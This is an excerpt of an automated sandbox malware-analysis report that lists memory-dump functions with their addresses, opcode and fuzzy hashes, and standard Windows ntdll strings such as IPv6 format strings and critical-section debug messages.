                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                • Instruction ID: 9b9fe3da5e6afe599706d70c652b4cb12ac064f475b6be101a1ccdf63cd0c931
                                                • Opcode Fuzzy Hash: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                • Instruction Fuzzy Hash: 9890023160540902D15071584854786000997E4301F55C012A0025655DC7658B557BB1
                                                Function 014A2AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                • Instruction ID: ef1594cdc0029d5175007cd9cfeaf8e6e129b01a3e3a4db3733c2bbaf449df62
                                                • Opcode Fuzzy Hash: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                • Instruction Fuzzy Hash: 59900225211401030105B5580B44547004A97E9351355C022F1016551CD73189615631
                                                Function 014A2AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
                                                • Instruction ID: 1c98c9eb8e0952ace9d4723098bdd5c9e634f273563195ac448fc83143f9ae36
                                                • Opcode Fuzzy Hash: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
                                                • Instruction Fuzzy Hash: 00900225221401020145B5580A4454B0449A7EA351395C016F1417591CC73189655731
                                                Function 014A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                • Instruction ID: bdc437eb78cc0bfae9a3405a537f0750a95a58de04202a52ede27aeb44e4a9fd
                                                • Opcode Fuzzy Hash: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                • Instruction Fuzzy Hash: 8F9002A1201541924500B2588844B4A450997F4201B55C017E1055561CC63589519635
                                                Function 014A2D00 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                • Instruction ID: a861611995e416999033f51c7465c88bf1a172c6b122e174d2058bed0959c215
                                                • Opcode Fuzzy Hash: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                • Instruction Fuzzy Hash: CE90022120544542D10075585848A46000997E4205F55D012A1065596DC7358951A631
                                                Function 014A2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                • Instruction ID: ebf8b2fe2f466b96026e320bfe7601e215b1961f583f9fd80b9a031ad0500390
                                                • Opcode Fuzzy Hash: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                • Instruction Fuzzy Hash: 3990022921340102D1807158584864A000997E5202F95D416A0016559CCA2589695731
                                                Function 014A2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee68877f0e7264cb246db3d39a66760a303f4eafc39e3378df90ddc1071ef840
                                                • Instruction ID: c731b0bc8c5551bf46a8286fac676865e2b761cdb6eb10602a8b6047635b5d1f
                                                • Opcode Fuzzy Hash: ee68877f0e7264cb246db3d39a66760a303f4eafc39e3378df90ddc1071ef840
                                                • Instruction Fuzzy Hash: 0390022130140103D140715858586464009E7F5301F55D012E0415555CDA2589565732
                                                Function 014A2DD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0acee9f8c14b54fbea05ccd2171e030ada878b20139c22a60169cdfe177f4397
                                                • Instruction ID: 480a28c9a13dafba16e52dae4d6fcff38d0329e9bca8f6defb6b23d2a0273db0
                                                • Opcode Fuzzy Hash: 0acee9f8c14b54fbea05ccd2171e030ada878b20139c22a60169cdfe177f4397
                                                • Instruction Fuzzy Hash: 5C900221242442525545B1584844547400AA7F4241795C013A1415951CC6369956DB31
                                                Function 014A2DB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38164e4c68e8035382a9f09934f0bd3d8a889b2a0740e5ee54e77126ed897915
                                                • Instruction ID: 381819a986ed9761c056025e4c448f322481f952c244c599b9a7dfdbf2985fb8
                                                • Opcode Fuzzy Hash: 38164e4c68e8035382a9f09934f0bd3d8a889b2a0740e5ee54e77126ed897915
                                                • Instruction Fuzzy Hash: 8790023124140502D14171584844646000DA7E4241F95C013A0425555EC7658B56AF71
                                                Function 014A2C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3dd717e2b79f9411f113ccb0353a2959120e1cb86c1e13b72994926ea425474
                                                • Instruction ID: aff886cf0bee069afbe45275feefb6b3ff82c929a44f0c4d92872f8d898b54d5
                                                • Opcode Fuzzy Hash: f3dd717e2b79f9411f113ccb0353a2959120e1cb86c1e13b72994926ea425474
                                                • Instruction Fuzzy Hash: 0990023120140942D10071584844B86000997F4301F55C017A0125655DC725C9517A31
                                                Function 014A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ba4960ddd6132b69deea7c67947e5799540aee667984568b4fa98ed8d1a2f5a
                                                • Instruction ID: cce2b56048e7b0bd56789148e14747f0826623143e7b2d6584ee1828996cd6d7
                                                • Opcode Fuzzy Hash: 6ba4960ddd6132b69deea7c67947e5799540aee667984568b4fa98ed8d1a2f5a
                                                • Instruction Fuzzy Hash: 8B90022160540502D14071585858746001997E4201F55D012A0025555DC7698B556BB1
                                                Function 014A2CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 071399d398c8702bcbfa2baaf49fabed2317e1c45a8ae7ffcfc6dbbd630279da
                                                • Instruction ID: 2bbb340c4f6f2c71fb2f0a4150b181b51dc280ec45cbb0c1663281035010610b
                                                • Opcode Fuzzy Hash: 071399d398c8702bcbfa2baaf49fabed2317e1c45a8ae7ffcfc6dbbd630279da
                                                • Instruction Fuzzy Hash: 1C90023120140503D10071585948747000997E4201F55D412A0425559DD76689516631
                                                Function 014A2CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e53db23bde53ea7da876c6941f571507578924bcfb9cb2dbc30aed66a86de887
                                                • Instruction ID: 7610f1d7589a1ba66440c221634064c10a4b19fd9fac623d8daed7a05d514f65
                                                • Opcode Fuzzy Hash: e53db23bde53ea7da876c6941f571507578924bcfb9cb2dbc30aed66a86de887
                                                • Instruction Fuzzy Hash: F090023120140502D10075985848686000997F4301F55D012A5025556EC77589916631
                                                Function 014A2F60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a526437b396500048a1de25e7865c2239f2442a6cb25e1cada6abf083acf894
                                                • Instruction ID: ca96db129a8355f42d2a49238ac63ce4dd00938efcf8cd9878414cee6f6bdac5
                                                • Opcode Fuzzy Hash: 5a526437b396500048a1de25e7865c2239f2442a6cb25e1cada6abf083acf894
                                                • Instruction Fuzzy Hash: FD90047131140143D104715C4C44747004DD7F5301F55C013F3155555CC73DCD715735
                                                Function 014A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a76cc582187bb239fdeb9773de17f81790cd769ba85053a27e66169fb4d3ce9
                                                • Instruction ID: 6420d27a446303430a478b207be85fd67bb7a40fd51a471b56dcdf680784bcfe
                                                • Opcode Fuzzy Hash: 2a76cc582187bb239fdeb9773de17f81790cd769ba85053a27e66169fb4d3ce9
                                                • Instruction Fuzzy Hash: F590026134140542D10071584854B460009D7F5301F55C016E1065555DC729CD526636
                                                Function 014A2FE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cc2bb3af2091944f4fc71a182b09e936aa353381c230840843051c883f70194
                                                • Instruction ID: 56a7c3ecc30781737508aafa2c4a385406e72324ef5e3e4ea591709c924600aa
                                                • Opcode Fuzzy Hash: 3cc2bb3af2091944f4fc71a182b09e936aa353381c230840843051c883f70194
                                                • Instruction Fuzzy Hash: 4B900221211C0142D20075684C54B47000997E4303F55C116A0155555CCA2589615A31
                                                Function 014A2F90 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c370016b1767ade6d09900ac145824f8b40c15450b46568ed781b408259a8fe8
                                                • Instruction ID: e5dfaaad0a0072895b346f47a2a6714b593562faeea347b5ecd2db8d3d9f63a6
                                                • Opcode Fuzzy Hash: c370016b1767ade6d09900ac145824f8b40c15450b46568ed781b408259a8fe8
                                                • Instruction Fuzzy Hash: 2A90023120180502D10071584C5474B000997E4302F55C012A1165556DC73589516A71
                                                Function 014A2FA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0405526221011c7ade5f85e999d687b02499ea8206503fd51fdfc950d82554b7
                                                • Instruction ID: aa8702a5c1b511f3a7ceb909fc1c9ead2853ba7d97c10de88e2e73f8d6fdd1b5
                                                • Opcode Fuzzy Hash: 0405526221011c7ade5f85e999d687b02499ea8206503fd51fdfc950d82554b7
                                                • Instruction Fuzzy Hash: 9690023120180502D10071584C48787000997E4302F55C012A5165556EC775C9916A31
                                                Function 014A2FB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7da417244985e06fc9c4e45df50961c1c0e5a02998f7f9096d40d211ea9002fd
                                                • Instruction ID: 42dd875b1130f38800c204300d41046b40167787654adc23ea5894d81b07597f
                                                • Opcode Fuzzy Hash: 7da417244985e06fc9c4e45df50961c1c0e5a02998f7f9096d40d211ea9002fd
                                                • Instruction Fuzzy Hash: 7E90022160140142414071688C849464009BBF5211755C122A0999551DC66989655B75
                                                Function 014A2E30 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74f213d49adae602e346627f05ab6b2b859d61293176ee2bbe2aa46519b94289
                                                • Instruction ID: 17714654a561aefb24215060ef7fe3973b3d7dbcbd4e76d1030b715fa6665446
                                                • Opcode Fuzzy Hash: 74f213d49adae602e346627f05ab6b2b859d61293176ee2bbe2aa46519b94289
                                                • Instruction Fuzzy Hash: D790022130140502D10271584854646000DD7E5345F95C013E1425556DC7358A53A632
                                                Function 014A2EE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0670824a698b5d87de69b03750ea503fa0066b9d4408e66fc7cfb535d155057
                                                • Instruction ID: 99ca016d017121cca0030e0fa2d4af4c0a19e47a0059684adc59a9e8e512c020
                                                • Opcode Fuzzy Hash: c0670824a698b5d87de69b03750ea503fa0066b9d4408e66fc7cfb535d155057
                                                • Instruction Fuzzy Hash: C390026120180503D14075584C44647000997E4302F55C012A2065556ECB398D516635
                                                Function 014A2E80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                • Instruction ID: 388da0fe915abba47e3b3910c3f6187c7e0f55c71ec8d69d02fb82637fd4e42c
                                                • Opcode Fuzzy Hash: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                • Instruction Fuzzy Hash: 8690022160140602D10171584844656000E97E4241F95C023A1025556ECB358A92A631
                                                Function 014A2EA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
                                                • Instruction ID: d3f9c2a0fdab093dd65488b22c783c7cb09acb50179200147a1f3179c9539f5c
                                                • Opcode Fuzzy Hash: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
                                                • Instruction Fuzzy Hash: 0590027120140502D14071584844786000997E4301F55C012A5065555EC7698ED56B75
                                                Function 014A3010 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                • Instruction ID: 9a0548f45d566d2b91ca738c65ec96a6f6e88ccd87f7bfdaf0ca6e6961cdf6f7
                                                • Opcode Fuzzy Hash: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                • Instruction Fuzzy Hash: 0790022120184542D14072584C44B4F410997F5202F95C01AA4157555CCA2589555B31
                                                Function 014A3090 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                • Instruction ID: a2ef11c06812a93a0c4ce2fa1d5c267da7fc71d595dfd780ebc7be383de3bea8
                                                • Opcode Fuzzy Hash: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                • Instruction Fuzzy Hash: 0690022124140902D14071588854747000AD7E4601F55C012A0025555DC7268A656BB1
                                                Function 014A39B0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                • Instruction ID: b6113a824cabe951f7dbffba76175c3538f116e5db79ac34faecae1f67b3fd7e
                                                • Opcode Fuzzy Hash: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                • Instruction Fuzzy Hash: B690022124545202D150715C48446564009B7F4201F55C022A0815595DC66589556731
                                                Function 014A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: a2b4e27ef477884cdf914af3e1defc8872726b59b345827ea3a3634443c29430
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 014A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 1d202cb3a5e32f8379ef075c8ace8580d2e77a609b1f2a99269eb783c5a55e34
                                                • Instruction ID: f24385fa1f14327eab5c8545c8ff93e9336f4b2de8df55aadcc53bf5294898b6
                                                • Opcode Fuzzy Hash: 1d202cb3a5e32f8379ef075c8ace8580d2e77a609b1f2a99269eb783c5a55e34
                                                • Instruction Fuzzy Hash: 0E51F4B2A00116AFCB11DF9D899097FFBB8BB28240B95822FF465D7651D374DE0097A0
                                                Function 01512410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 73c1d48175063a5ccf68c8260300b7dac39435962c33b076b21b5a34d20bcdda
                                                • Instruction ID: c409bd1759888d487f807f324dad64a2b0d95922ff99f382ecc4e1c403ad9bf9
                                                • Opcode Fuzzy Hash: 73c1d48175063a5ccf68c8260300b7dac39435962c33b076b21b5a34d20bcdda
                                                • Instruction Fuzzy Hash: 69510975A006456EEB36DF5DC8D097FB7F8FB44200F24885EE496CB646E6B4DA40C760
                                                Function 01497630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014D46FC
                                                • Execute=1, xrefs: 014D4713
                                                • ExecuteOptions, xrefs: 014D46A0
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 014D4742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 014D4787
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 014D4655
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 014D4725
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 61170145ef6683c9c06a935bc28ce51ddd2205b8145b97c5082b2d3653f702b7
                                                • Instruction ID: 05890b60ed7d50daea901da674c314c1aa5ff2d1110925e3dd6e9432d452182f
                                                • Opcode Fuzzy Hash: 61170145ef6683c9c06a935bc28ce51ddd2205b8145b97c5082b2d3653f702b7
                                                • Instruction Fuzzy Hash: DD513C316002196BEF109BA9DC55FAE7FA8AF64311F1800DFD609AB2B1E770AE458F50
                                                Function 014AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 923cf12ae9efa7531cb3b2e363759f1b38e22c469a27cdc2ae4d714ca512a77d
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 8E81CF74E052498EEF258E6CC8907FEBFB1EF65320F9A421FD865A73A1C77088418B51
                                                Function 015120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                • Instruction ID: 08e334d1712671662bfb4fee34566518e3a0ecd0156483ef53ee26c3461863a7
                                                • Opcode Fuzzy Hash: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                • Instruction Fuzzy Hash: 6121657AE00119ABEB11DF79DC40AEEBBF9FF64650F55011AE905E7205E730D9018BA1
                                                Function 0148F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014D02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014D02E7
                                                • RTL: Re-Waiting, xrefs: 014D031E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
